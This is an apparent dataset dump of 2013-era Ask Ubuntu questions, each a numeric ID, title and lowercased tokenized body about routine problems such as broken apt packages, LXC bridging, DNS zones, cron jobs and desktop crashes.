xserver-xorg-video-mach64-lts-quantal xserver-xorg-video-mga-lts-quantal xserver-xorg-video-modesetting-lts-quantal xserver-xorg-video-neomagic-lts-quantal xserver-xorg-video-nouveau-lts-quantal xserver-xorg-video-openchrome-lts-quantal xserver-xorg-video-r128-lts-quantal xserver-xorg-video-radeon-lts-quantal xserver-xorg-video-s3-lts-quantal xserver-xorg-video-savage-lts-quantal xserver-xorg-video-siliconmotion-lts-quantal xserver-xorg-video-sis-lts-quantal xserver-xorg-video-sisusb-lts-quantal xserver-xorg-video-tdfx-lts-quantal xserver-xorg-video-trident-lts-quantal xserver-xorg-video-vesa-lts-quantal xserver-xorg-video-vmware-lts-quantal xterm xul-ext-ubufox xz-lzma yelp zeitgeist zeitgeist-core zeitgeist-datahub zenity zip the following new packages will be installed : libenca0 libgl1-mesa-glx libglapi-mesa librcc0 librcd0 libtag1-rusxmms python3 python3-minimal python3.2 python3.2-minimal ssh-import-id warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! apt libapt-pkg4.12 ( due to apt ) gnupg ( due to apt ) base-files bash 0 upgraded , 11 newly installed , 1168 to remove and 0 not upgraded . need to get 4,975 kb of archives . after this operation , 2,581 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] n
350503	switching juju lxc bridge	i 've set up juju running in lxc , and i 'm attempting to expose it to the internal network . i 'm generally following this question to point lxc to my existing bridge ( eth-br0 ) . i 've edited /etc/default/lxc and /etc/lxc/default.conf as per the post , but when i try to bootstrap i get : 2013-09-26 19:47:05 info juju.provider.local environprovider.go:32 opening environment `` local '' 2013-09-26 19:47:05 error juju.utils network.go:37 can not find network interface `` lxcbr0 '' : net : no such interface 2013-09-26 19:47:05 error juju.provider.local environprovider.go:48 failure setting config : net : no such interface 2013-09-26 19:47:05 error juju supercommand.go:282 command failed : net : no such interface error : net : no such interface obviously something is still trying to point to lxcbr0 rather than the existing bridge . if i just want to expose a lxc juju to the network , is this the best way to do it and how should i configure it properly . i can attach my ifconfig if necessary .
350505	unable to run any apt-get command	this is a weird problem and i ca n't find a direct solution . i ran sudo apt-get update & & sudo apt-get upgrade -y ( i have n't ever run it on this machine but it is ubuntu server 12.04 like all the others ) . it goes through the updates and get part way through upgrade then i get this error ( reading database ... 80 % dpkg : unrecoverable fatal error , aborting : files list file for package 'mysql-common ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 ) now i am getting this same error when i try to run any apt-get command . i have tried : apt-get clean apt-get autoremove apt-get install -f mysql-common apt-get install -- reinstall mysql-common and maybe some others that i ca n't think of now . most of the time , not always , and i can recollect exactly what commands it happens on ( i have been hacking at this for a while now ) it ends with that error . i am still unable to update . any ideas ? edit rehatcc 's answer lead me to check out the mysql-common.files per the error files list file for package 'mysql-common ' is missing final newline the file is just garbage text . is this like a template file that is generic across all systems ? can i just paste in the text from another system ?
350506	can someone help me get ubuntu touch on my huawei ascend y300 ?	i have a huawei ascend y300 which is the better big brother to the g300 . i would like ubuntu touch installed on it , as it 's the only device i have without ubuntu . it 's a popular phone and i 'm sure this would help many people out . thanks !
350510	is there a way to get osx style file previews in the file browser ?	in the default file browser of osx , pressing space will preview the file in question . is there already something similar that i have n't found , or is there a way to add the functionality to ubuntu ?
350511	publish website with own dns server and domain name	i 'm trying to publish my own website with my own bind9 dns server running in ubuntu server 12.04.3 i 've registered the domain name example.com.ar in nic.ar ( entity that registers domains in argentina ) delegated to my own dns ns1.example.com.ar ip 200.44.44.244 and ns2.example.com.ar ip 200.44.44.245 . i have the following network configuration : 192.168.0.1 gateway1 ext ip 200.44.44.244 freebsd pfsense firewall 192.168.0.6 gateway2 ext ip 200.44.44.245 debian iptables firewall 192.168.2.111 webserver ubuntu server 12.04.3 bind9+lamp+dovecot i need to configure webserver to be able to reach from the internet the websites allocated there from www.example.com.ar i 'm having a lot of trouble with dns zones and records . i 've tried nslookup example.com.ar from the outside of my network but it 's unreacheble . any help would be appreciated . thanks . edit : this is my example.com.ar zone : $ ttl 3h @ in soa ns1.example.com.ar . admin.example.com.ar . ( 1 ; serial 3h ; refresh after 3 hours 1h ; retry after 1 hour 1w ; expire after 1 week 1h ) ; negative caching ttl of 1 day ; @ in ns ns1.example.com.ar . @ in ns ns2.example.com.ar . example.com.ar . in mx 10 mail.example.com.ar . example.com.ar . in a 192.168.2.111 ns1 in a 192.168.2.111 ns2 in a 192.168.2.111 www in cname example.com.ar . mail in a 192.168.2.111 ftp in cname example.com.ar . if i just forward my port i 'm able to reach the web site by using my external ip address but i ca n't by its domain name .
350512	boot ubuntu 12.04 lts server iso from grub2	i checked grub2 loopback booting ubuntu server iso , and i still have some problems . the menuentry is : menuentry `` install ubuntu server '' { set isofile= '' /iso/ubuntu-12.04-server-amd64.iso '' loopback loop $ isofile set gfxpayload=keep linux ( loop ) /install/vmlinuz file=/cdrom/preseed/ubuntu-server.seed iso-scan/filename= $ isofile quiet -- initrd ( loop ) /install/initrd.gz } although this menuentry actually boots from the server iso file , it does not support any kickstart unattended installation . is there a way to make my custom 12.04 server install image that has unattended install configurations via kickstart boot from grub2 ?
350514	create bootable usb drive on mac for windows	i need to create a bootable usb drive for ubuntu for a windows machine , but i got a mac ... how can i make a bootable usb on a mac , for a windows machine ?
350515	xubuntu desktop breaks on tightvncserver	i have a desktop pc i want to remote desktop to , i also like the concept of virtual displays , so no one can see what i 'm doing as i do it unless they connect to the display ( as opposed to the standard vino setup where whatever i do would be shown on any real displays attached to the pc ) . the problem is i that when i connect to it , the desktop seems broken , the theme goes gray ( windows 95 style ) and some icons are even missing ( see image below ) . my xstartup script looks like : $ cat .vnc/xstartup # ! /bin/sh xrdb $ home/.xresources xsetroot -solid grey # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & # fix to make gnome work # export xkl_xmodmap_disable=1 # /etc/x11/xsession # exec ck-launch-session startxfce4 startxfce4 & # xfce4-session & please help ,
350519	unable to upgrade to ubuntu 12.04	i have attempted few times to upgrade to ubuntu 12.04 , but the message that keeps popping up is of some broken package ( i got no clue as to what it means ) and unable to get exclusive lock . i tried to fix 'broken packages ' following instruction from this forum . nothing happened . how can i fix this ?
350523	how to back up ubuntu 12.04	now that remastersys is no longer available in the repos , what is the best to use for making a complete backup ( hopefully available in software center ) for ubuntu 12.04 64bit ? i have been told relinux is good , is there something else that will work better ?
350526	where can i find the documentation ?	i know , this is a stupid question , but can somebody tell my wehre i can find the documentation of ubuntu 13.04 . i have not installed ubuntu yet , but i booted it from a cd . i only want to use ubuntu . thanks !
350527	how do i reset my ubuntu password on a laptop that came with windows 8 pre-installed ?	my laptop came with windows 8 pre-installed and uses uefi ( the successor to bios ) by default . it has been working fine for me for a few months . i decided to install ubuntu with the goal of a conventional dual-boot setup . i disabled windows 8 's secure boot and fast startup features to avoid any problems these might cause and shrunk my primary partition by 13 gb from within windows 8 so that there would be some free space in which to install ubuntu . i downloaded ubuntu 12.04.3 on a separate linux machine and used the iso file to create a bootable usb drive with startup disk creator . then i booted my windows 8 laptop from the usb drive , and successfully installed ubuntu in the previously allocated free space . then , dumb me , i immediately forgot my new password . when i reboot my machine it always brings me to ubuntu without any prompts . i tried entering recovery mode to reset my ubuntu password , but when i try pressing or holding the left shift key at any point during the boot sequence , the boot sequence simply continues uninterrupted . the page about recovery mode linked to in the previous sentence says that if i restart ( as opposed to power down and power back on ) , i should meet with a prompt to enter recovery mode , but i do n't . any suggestions that would ( a ) enable me to boot windows 8 , ( b ) enable me to recover my password , and/or ( c ) enable me to re-install ubuntu completely would be greatly appreciated . i have read that running boot repair would enable me to boot windows 8 , but as far as i understand that requires super user privileges ( sudo ) .
350530	upstart job not starting	can someone help me with a startup script not starting ? i started it with initctl start startupscript , and it works fine . but it wont start at startup ( = virtualbox , and mount , doesnt execute ) . i need sleep , and i can not fix this server bug , -_ i suspect something is wrong with mount , or sleep related to starting up . i have done initctl reload-configuration to no avail . start on filesystem script wall /root/startup.txt eject /dev/sr0 /bin/umount /dev/sdb2 /bin/sleep 2s /bin/mount /dev/sdb2 /mnt/virtualbox /bin/sleep 5s vboxmanage startvm `` windows 7 '' -- type headless /bin/sleep 25s /usr/local/bin/noip2 wall /root/startupcomplete.txt end script post-start script end script ( eject0 === my usb modem ) ( sdb2 === disk with virtualbox image ) ( virtualbox start & noip execution )
350541	cronjobs made via cronjob not working	i have the following in my cronjob -e : 00 17 * * 1-5 /home/jhvisser/bin/drive-at-five-record 00 18 * * 1-5 pkill rtmpdump 50 15 * * 1-5 /home/jhvisser/bin/z1035-no-commercial 55 16 * * 1-5 pkill rtmpdump looking at the cron log it seems like the scripts should have been run , however no files were created like the jobs would have done . log : sep 26 07:39:01 jhvisser cron [ 27399 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 07:44:01 jhvisser cron [ 27459 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 08:09:01 jhvisser cron [ 27639 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 08:39:01 jhvisser cron [ 28010 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 08:44:01 jhvisser cron [ 28100 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 09:09:01 jhvisser cron [ 28498 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 09:39:01 jhvisser cron [ 28732 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 09:44:01 jhvisser cron [ 28802 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 10:09:01 jhvisser cron [ 29066 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 10:39:01 jhvisser cron [ 29300 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 10:44:01 jhvisser cron [ 29355 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 11:09:01 jhvisser cron [ 29537 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 11:39:01 jhvisser cron [ 29767 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 11:44:01 jhvisser cron [ 29826 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 12:09:01 jhvisser cron [ 30004 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 12:39:01 jhvisser cron [ 30230 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 12:44:01 jhvisser cron [ 30288 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 13:09:01 jhvisser cron [ 30495 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 13:39:01 jhvisser cron [ 30747 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 13:44:01 jhvisser cron [ 30806 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 14:09:01 jhvisser cron [ 30987 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 14:39:01 jhvisser cron [ 31239 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 14:44:01 jhvisser cron [ 31300 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 15:09:01 jhvisser cron [ 31678 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 15:39:01 jhvisser cron [ 31938 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 15:44:01 jhvisser cron [ 31996 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 15:50:01 jhvisser cron [ 32027 ] : ( jhvisser ) cmd ( /home/jhvisser/bin/z1035-no-commercial ) sep 26 16:09:01 jhvisser cron [ 32179 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 16:39:01 jhvisser cron [ 32413 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 16:44:01 jhvisser cron [ 32447 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 16:59:01 jhvisser cron [ 32571 ] : ( jhvisser ) cmd ( pkill rtmpdump ) sep 26 17:00:01 jhvisser cron [ 32578 ] : ( jhvisser ) cmd ( /home/jhvisser/bin/drive-at-five-record ) sep 26 17:09:01 jhvisser cron [ 32652 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 17:39:01 jhvisser cron [ 720 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) sep 26 17:44:01 jhvisser cron [ 756 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 26 18:00:01 jhvisser cron [ 910 ] : ( jhvisser ) cmd ( pkill rtmpdump )
350543	gnome 3.10 on ubuntu 13.04	is it possible to install the newly released gnome version ( 3.10 ) on 13.04 ? if it 's possible , then how ?
350545	remove the sound cracking adjusting the volume using the ladspa equalizer	i 'm using the ladspa pulseaudio equalizer and i have a problem : if i set the equalizer as the default device all the stream start equalized but adjusting the equalizer volume make cracking sounds if i set the internal audio ad default the volume control is ok but every new stream that starts start unequalized because the default device is't the equalizer so there are some trick to use the equalizer for all stream whitout selecting as default device using the defaultvolume control to adjust the volume of a non-default device ?
350546	computer wo n't load unity panels after installing and then uninstalling nvidia graphics driver	after i installed the nvidia-304 driver , my computers will not load the unity panel or launcher , please help ! screenshot : http : //ubuntuone.com/35fyhpklgkevksv0teinfx
350548	how to upgrade gnome 3.4 to 3.10 ?	i have been happily using the gnome desktop environment to complete my day-to-day computing . recently , i learned that gnome 3.10 was released . i tried to update using the ppa : gnome3-team/gnome3 . however , apt-get update is unable to find that ppa . i also discovered that i am actually using gnome 3.4.1 , not 3.8.x . how can i upgrade ? \ notes : i installed using sudo apt-get install gnome and am using ubuntu 12.04 . any help is greatly appreciated . thanks for your time .
350549	pc crash during nautilus file move . files vanished . are they recoverable ?	i moved a dozen of photos ( jpg files ) from one hard disk ( the memory card of my camera ) to an other one ( the hard disk of my pc ) . just at that time my pc crashed . after reboot i saw the files neither in the source nor in the target folder . is there any ( nautilus ) cache where i could find the lost photos ? lenovo thinkpad sl510 notebook intel core 2 duo cpu t5870 bios v1.12 2009-10-19 linux 3.2.0-53-generic-pae , ubuntu 12.04.1 lts
350558	how do i go about porting ubuntu touch to different devices ?	i would like to port ubuntu touch to a device that is currently not supported . what are the requirements for doing this and where do i begin ?
350559	usb install will not work with i386 or amd64 iso	having trouble installing ubuntu . i downloaded the 12.04.3 desktop i386 iso image , used the universal installer to put it on a usb drive ( the netbook does not have a cd drive ) . netbook- acer aspire one with amd arm c-60 processor 1mhz with 4gb ram . i changed the boot order to usb and i get : syslinux 4.06 edd 2012-10-23 copyright 1994-2012 h.peter anvin et al _ and cursor flashing but you cant write anything , no buttons work you have to do a hard shutdown to leave . i tried the same procedure with the amd64 iso and get same results . why did it not boot ?
350562	can i triple boot windows 7 , ubuntu 13.04 and kubuntu ?	i have ubuntu 13.04 and windows 7 . i heard that kubuntu is more like windows , so i wanted to try it . is it possible to triple boot them ? if it is can you tell me how to . i have installed ubuntu on a partition .
350564	can i change notification dialog text ?	i am using the latest xubuntu 13.04 . when i go to shut down , i receive the confirmation notification stating `` are you sure you want to shut down ? '' i would like to keep this dialog box , but i want to customize the message it displays . can this be done ?
350568	installation without cd or usb please help	how do i install ubuntu without having to burn to a cd or usb ? i need this for class and the pop up for cd keeps coming up then it tells me my cd is too small
350569	which files will be available to me after wubi install	i am planning to install ubuntu via wubi on my pc . i have two hard drives . on the hard drive with my c : partition , i have two partitions - c and e. my question in - if i install ubuntu via wubi , would the e : partition files be accessible by me
350572	ubuntu in a virtual box	i need to run ubuntu through oracle vm virtual box . can someone please walk me through it ? do i download ubuntu first then open the vm and install it there ? or do i need an image ? very new to this please help !
350575	kernel panic not syncing : vfs : unable to mount root fs on unknow-block ( 0,0 )	this is happening on usb version 13.04 , too many times . i have tried the suggestions but i am not able to proceed to get the commands to be accepted when i type in . can someone be more precise in the instructions . i type in this ok : sudo mount /dev/sda1 /mnt but this line it gives error : mnt/dev does not exist ? ? ? sudo mount -- bind /dev /mnt/dev
350576	getting the widget toolkit for a particular window	is there a way to get the widget toolkit used to draw a particular window ? something like xprop or xwininfo that will show it to be gtk+ , qt or similar .
350577	what is the `` public '' folder used for ?	in my home folder , there is a folder called public . why is it put there ? is there any reason a user should n't delete it ? if it is n't needed perhaps a bug report should be filed , because it was there immediately after i installed the system . it seems to go missing after i delete it and reboot . i was n't sure if this was 13.04 specific or not . if it is n't feel free to remove the 13.04 tag and this text .
350578	my desktop shows no video signal on boot ?	computer : dell optiplex gx620 monitor : hp w1907 os : dual-boot ubuntu 13.04/windows 7 problem : when i turn my computer on it shows no video signal . the power light is on and the vga cord is completely in . after about 5 minutes i 'll unplug and restart my computer . sometimes when i do this i can hear the fan blowing at full power . after about 15-20 trial-and-error runs i 'll finally get the computer on and boot up normally . how can i fix this ? *note : i am reluctant to open up my computer , but i will as a last resort .
350579	lenovo t530 randomly turns off when connected to external monitor	i 've been experiencing a very strange problem on my lenovo t530 on ubuntu 12.04 . the computer randomly shuts off with no warning . this seems to be completely random , although i 've noticed that it only happens when i 'm connected to an external monitor . i 've tried various things including installing various versions of my video drivers ( i 'm using nvidia drivers , version 319.32 , but the problem happens on older versions as well ) . i 've looked in /var/log/dmesg and /var/log/syslog but there appears to be no record of any problems . the laptop is normal temperature , and there is no indication that anything is wrong except that it just shuts off . has anyone seen this and have any additional tips of things i could try or places i could look for more information ? here is sample output of the crash from the last -xwf command : cory pts/0 :0.0 thu sep 26 19:19:57 2013 - crash ( 00:01 )
350580	root owns home directory , chown does not work	i am running ubuntu 12.04 and having various problems . i have traced it back to the fact that my user 's home directory ( /home/user ) is owned by root . the /home directory is actually mounted on another drive , but i can see that in fstab i am mounting only /home and not /home/user : uuid=dc56d19e56dx3233 /home ntfs user , exec 0 2 the chown command below does not seem to work : sudo chown -r user /home/user this will run without errors , however it does not actually change ownership of the direcory . here is the output of ls -ld after running the command : drwxrwxrwx 1 root root 20480 sep 25 00:07 /home/user this is the same as it was previously .
350581	in ubuntu 13.04 i can not get firefox to open .torrent files by default	i am trying to get firefox to open torrent files by default , it only gives me the option to cancel or save ... . if i look in the application section of preferences assigning bittorrent or torrent files is not an option they do not appear as assigned or unassigned . i am trying to open it with deluge by default but ca n't get it to open with anything so not sure that is relevant . obviously am able to save and then open with deluge after but a crap option if trying to download a bunch of stuff at once .
350583	problem converting my computer to ubuntu due to inability to navigate bios	i wish to replace windows/vista operating system on an old lenovo/ibm computer with ubuntu . i downloaded ubuntu to a cd . however , when i enter the bios program to change the boot priorty , i get a message saying that the boot priority can only be changed in supervisor mode . i do n't know how to get to `` supervisor mode '' .
350588	terminal and software center missing	i can not find either the ubuntu software center or the terminal anywhere on my computer . i downloaded virtualbox from their website and after it started applying changes in the software center the software center closed and disappeared along with the terminal . those are the only ones i have noticed but there might be others missing too . message from sudo apt-get check reading package lists ... done building dependency tree reading state information ... done
350593	make < super > +1 shortcut to open a new window	i use ubuntu 13.04 freshly installed . i like to use the shortcut super+ 1 ( until 9 ) to open applications . problem is : when i hit it a second time , it shows me the window i previously opened , instead of opening a new window , as i would like it to do . how can i change that ? i tried in settings , and with about : config , nothing ! ! i also would like to change shortcuts super+ctrl+left and super+ctrl+right with super+left and super+right , but i did n't find where i can . i found for super+up and super+down in settings , but not for left and right .
350594	compilation problem in geany	i started using geany recently and i tried to compile a new .c file i wrote , but the complier did not seem to recognize conio.h [ `` fatal error '' ] and simply ignored math.h . as a result i could not build the program . i have never faced this problem before . do i have to download and save all the headers in the project directory ? please help .
350595	how do i format my hard drive to ntfs from ext4	i have a usb with my windows iso loaded and ready . problem is there is no ntfs partition on my hard drive for windows to load onto . i do n't want to complicate things by running 2 operating systems . i’d like to go back to windows . i like ubuntu more but i have no clue what i’m doing . i’m not a programmer . i’ve tried booting from my usb with windows 7 loaded on as well as a cd with vista ultimate . neither gave me an option to repair my drive . both have the option to delete partition , and the cd gave me the option to format partition . the formatting failed and i’m afraid to delete the partition because i do n't know what to do if i delete ubuntu and the drive remains in ext4 format . please help .
350603	how to format my computer , wipe out windows , and set it with only ubuntu ?	i am absolutely new to linux and do n't know a whole lot about this , but i 'm trying to learn ! i already looked through old questions and it seems that usually the installation of ubuntu offers the option of replacing the old windows instead of running ubuntu alongside it , but i never got that option . because my computer is a two year old netbook and is getting super slow , i would like to format it and run only one os , just need it for the basics ( school , email , music ... ) . so now , i have both ubuntu ( i think its 12.04.3 lts ) and win 7 starter on my computer , how should i go about this ?
350606	lubuntu 32-bit secure boot	i am planning to use lubuntu with win8 secure boot pc . will the 32-bit live iso of lubuntu boot ( and work ) with the win8 secure boot pc ? will the 32-bit live iso of lubuntu support secure boot ? thanks .
350612	unbale to use q ( lowercase ) key after a failed key-binding effort	i tried to use the alt-q combination to set as a shortcut for opening 'terminator ' using gconf - > metacity- > global keybindings . but it did not work . the problem now is that my 'q ' key on the keyboard does n't work ( i am copy pasting 'q ' here ) . funny thing is that 'q ' still works fine . i am unable to track the fault . i have reset all the keybindings and reset the system many times , but all in vain . what can be done in this regard ?
350614	remove unity and replace with something different	i need to `` safely '' remove unity 12.04 and replace it with something different . i have looked and i have tried a couple of things ( one which caused a complete re-install of ubuntu ) . so maybe someone else can help . i am a tinkerer ! i love customization ! i get bored and have to constantly change things , and unity just wo n't give me that freedom ! ! do n't get me wrong , i love unity for something else , and there are a lot of great things about it . but it is just not for me ... any suggestions would be greatly appreciated ... what i am looking for : '' safe removal '' , of unity , and install of `` something new '' ... as much customization as possible ... bells and whistles ! please help ! ...
350617	after installing gconf-editor , tweak tool does n't work	i used tweak tool to personalize gnome 3.6 but recently i 've installed maximus and gconf-editor and the tweak tool wo n't work anymore . any ideas ?
350618	ubuntu 13.04 unable to mount my lumia 720	i shifted permanently from the windows 8 to the ubuntu , but i have a windows phone and i need to sync music pictures books . but in ubuntu 13.04 i can not mount the device and displays error . foremost i need to mount the device to perform any action .
350623	compiz is crashing on startup in ubuntu 13.04 after installing steam-login	i installed steam-login from here and it worked just fine . then i went back to unity and it would n't load unity anymore . when i tried running compiz from the ctrl+alt+f1 command line it gave me the output below . when i googled the first error line , i found this page . it 's in greek but it does mention xfwm4 which steam-login makes use of so i 'm thinking that could be the culprit . any suggestions on how to reset things ? i tried this page , that did n't do it , as well as some of the commands in the other greek web page and that did n't work either . compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : starting plugin : opengl compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity warn 